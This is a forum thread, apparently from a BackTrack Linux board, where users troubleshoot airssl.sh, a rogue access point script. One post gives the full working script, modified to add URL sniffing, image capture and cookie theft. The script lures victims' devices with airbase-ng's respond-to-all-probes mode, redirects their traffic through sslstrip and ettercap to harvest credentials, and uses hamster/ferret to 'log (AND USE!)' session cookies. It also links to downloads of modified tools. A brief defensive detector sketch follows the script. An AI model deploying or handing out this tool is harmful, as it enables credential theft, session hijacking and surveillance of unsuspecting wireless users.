I got an error, can't get IP address!
I use Intel 3945ab wireless adapter for receiving internet, and rtl8187 for fake AP...
Does anyone have a solution for this problem?
When I run the script I get this error after the airbase is trying to configure at0:
at0: ERROR while getting interface flags: no such device
I tried both scripts 1.0, 2.0
I have a rtl8187, internet adap eth0, fake ap wlan0....
What am I doing wrong?
thanks!!!
Hello.
How can I configure the fake AP to use a WPA2 key?
I try to use a broadband modem (ppp0 interface) as the internet interface, but on the client I can't get an internet connection. Any workaround?
Hi, I'm having the next error:
What can be the problem?
Code:
root@bt:~# /root/airssl.sh
AIRSSL 2.0 - Credits killadaninja & G60Jon
0.0.0.0 192.168.2.1 0.0.0.0 UG 0 0 0 eth0
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
192.168.2.1
Enter your interface that is connected to the internet, this should be listed above. For example eth1: eth0
Enter your interface to be used for the fake AP, for example wlan0: wlan0
Enter the ESSID you would like your rogue AP to be called: Nancy
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
8976 dhclient
8995 dhclient
Interface Chipset Driver
wlan0 RTL8187 rtl8187 - [phy0]
(monitor mode enabled on mon6)
mon0 RTL8187 rtl8187 - [phy0]
mon1 RTL8187 rtl8187 - [phy0]
mon2 RTL8187 rtl8187 - [phy0]
mon3 RTL8187 rtl8187 - [phy0]
mon4 RTL8187 rtl8187 - [phy0]
mon5 RTL8187 rtl8187 - [phy0]
[+] Configuring FakeAP....
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?
Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
N
[+] Configuring forwarding tables...
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...
Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N
I have my wired network in eth0
My wireless wlan0
Thanks!
Fettmaster I have the same issue....
Hey, noobie here. I am having problems with airssl.sh. Here are the adapters I am using:
wlan0 Atheros ath5k - [phy0]
ra0 Ralink 2560 PCI rt2500
The ra0 is an Alfa AWUS036nh.
The wlan0 is my internet connection.
Here is my problem: I have tried to kill the processes using sudo kill ---
and they just keep popping up with new process numbers. Also, I get the at0 errors seen below. If you need any more info, please let me know.
AIRSSL 2.0 - Credits killadaninja & G60Jon
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0
Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
192.168.0.1
Enter your interface that is connected to the internet, this should be listed above. For example eth1: wlan0
Enter your interface to be used for the fake AP, for example wlan0: ra0
Enter the ESSID you would like your rogue AP to be called: mine
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
11282 wpa_supplicant
11291 dhclient
11356 dhclient
Process with PID 11282 (wpa_supplicant) is running on interface wlan0
Process with PID 11356 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
ra0 Ralink 2560 PCI rt2500 (monitor mode enabled)
[+] Configuring FakeAP....
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?
Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A
a
[+] Starting FakeAP...
[+] Configuring forwarding tables...
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: No such process
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...
Hi all !
I'm not trying to hijack your thread, but your script inspired me (well, taught me to be more precise) and I made a script of my own, with different means though. It's much simpler and works for local use. I of course gave you credit in the thread that people can find here : http://www.backtrack-linux.org/forum...utomation.html if they're interested !
Concerning your script I made changes for my own use. For example, why do you use airmon-ng when you could just set your interface to monitor mode ? It worked better for me when using
Code:
ifconfig $fakeap_interface down
iwconfig $fakeap_interface mode monitor
ifconfig $fakeap_interface up
I also removed some xwindows that I found to be useless (sslstrip for example).
Anyway, great work, thanks !
(Check your PMs) EDIT : or don't, I couldn't send you one due to your box over load :p I sent it to your "visitor messages"
::EDIT::
I messed around a bit with this original scripting and added the option for URL snarf as well as using hamster / ferret to autolog cookies. It works locally, haven't tested it on other machines.
Here's the pastebin: http://pastebin.com/JxkdHuH6
Code:
#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi
if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi
if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi
# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
sleep 2
# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
# URLSnarf
echo
echo "[+] URLSnarf?"
echo
echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
echo "Y or N"
read URLSN
if [ $URLSN = "y" ] ; then
echo
echo "[+] Starting URLSnarf..."
xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
sleep 3
fi
#Impliment Ferret / Hamster for cookies!!!
echo
echo "[+] Hamster / Ferret?"
echo
echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
echo
echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
echo
echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
echo
echo "NOTE: Cookies will be logged, however they will all show up under your local IP address"
echo "Y or N"
read HAMSTER
if [ $HAMSTER = "y" ] ; then
echo
echo "[+] Starting Hamster / Ferret..."
xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
sleep 1
xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
sleep 3
fi
# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT
if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
kill ${urlsnid}
kill ${ferretid}
kill ${hamsterid}
airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit
fi
exit
Keep in mind that you need to use my modified versions of hamster because for some reason the hamster port was showing up as in use, so I changed the default IP and port #. Just extract the tar to its default folder in /root/ so they would be accessible at /root/moddedhamster/ferret -i eth0 for example. (download them here: http://www.mediafire.com/?7b12zu28185e1wp ) The instructions for hamster will show up when you get to that point.
Note to OP: If this is against your wishes in any way, let me know and I'll pull the post.
-Adam
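Seen from the monitoring side, the "respond to all probes" mode described in the script's menu (`airbase-ng -P`) leaves a recognizable pattern: one BSSID answering probe requests for many unrelated ESSIDs, including names no real AP should know. The sketch below is an added example, not part of the thread or of airssl; the observation records and canary name are constructed, and the threshold is an assumption.

```python
from collections import defaultdict

# Constructed sample: (bssid, essid) pairs taken from probe responses
# recorded by a wireless monitoring sensor. Not real capture data.
OBSERVATIONS = [
    ("00:11:22:33:44:55", "CorpWiFi"),
    ("00:11:22:33:44:55", "CorpWiFi"),
    ("66:77:88:99:AA:BB", "HomeNet"),
    ("66:77:88:99:aa:bb", "CoffeeShop"),
    ("66:77:88:99:aa:bb", "AirportFree"),
    ("66:77:88:99:aa:bb", "canary-7f3a9c"),
    ("cc:dd:ee:ff:00:11", "GuestNet"),
]

# Random ESSIDs the sensor itself probes for; no legitimate AP answers them.
CANARY_ESSIDS = {"canary-7f3a9c"}
# Assumed threshold: multi-SSID APs normally use one BSSID per ESSID,
# so more than two names behind a single BSSID is worth an alert.
MAX_ESSIDS_PER_BSSID = 2


def find_probe_responders(observations, canaries=CANARY_ESSIDS,
                          max_essids=MAX_ESSIDS_PER_BSSID):
    """Return {bssid: [reasons]} for BSSIDs that answer for too many ESSIDs
    or for a canary ESSID."""
    essids_by_bssid = defaultdict(set)
    for bssid, essid in observations:
        # Normalise case so the same radio is not counted twice.
        essids_by_bssid[bssid.lower()].add(essid)

    findings = {}
    for bssid, essids in essids_by_bssid.items():
        reasons = []
        hit = essids & set(canaries)
        if hit:
            reasons.append("answered canary ESSID: " + ", ".join(sorted(hit)))
        if len(essids) > max_essids:
            reasons.append(f"{len(essids)} distinct ESSIDs from one BSSID")
        if reasons:
            findings[bssid] = reasons
    return findings


if __name__ == "__main__":
    for bssid, reasons in find_probe_responders(OBSERVATIONS).items():
        print(bssid, "->", "; ".join(reasons))
```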
Quick question. I have been trying this script over the weekend and wondered if anyone has had any luck with the following scenario. I have my laptop with wlan0 and wlan1, and each works in monitor mode / injection mode. wlan1 is an Alfa card; wlan0 is the internal wireless Intel Wireless N 1000. But what happens when I run the script is I use my Windows computer to test to see if it is capturing information and I can't see the network I am broadcasting from wlan1, and I can no longer access the network I am connected to on wlan0, although I can still browse from the machine running the script. Am I too hopeful that this can all be done wirelessly? Or does anyone see any inherent failures in my description here? The script appears to start and run correctly, just no networks. Are you supposed to shut down the other wireless and just use the ethernet?
Let me say I'm quite impressed with this little one. Here's my experience with it:
Running Macosx 10.6.6 on 13" Aluminium Unibody Macbook with the following config:
VM software: VirtualBox 4.0.4
BT: BT 4 Final
Internal Airport Wireless: Used for internet access to my home's AP
External USB Encore Wireless Dongle: FakeAP
In order to make it work I had to make some minor changes to what I thought would be a straightforward thing.
1) On the VM, instead of setting the interface as NAT, had to set it as Bridged so it directly connected with my network.
2) Had to pass control of the USB Wireless Dongle to the VM(obviously)
3) If I started the script after starting interfaces (/etc/init.d/networking start) this happened:
Code:
PID Name
5024 dhclient3
5130 dhclient3
Process with PID 5130 (dhclient3) is running on interface wlan0
And DHCP wouldn't work for victims.
So in order to get it working, had to issue "killall dhclient3" prior to starting the script.
After this, it worked pretty good, the only problem is that I found it slow and unstable, I'm not sure if I should blame this cheap USB card or the script :)
What I still don't find how to fix is after I stop the script by pressing "y" when I want to rerun it it simply won't work. I guess all the housekeeping is not done there, any thoughts?
Once again I'd like to thank killadaninja for this nifty script.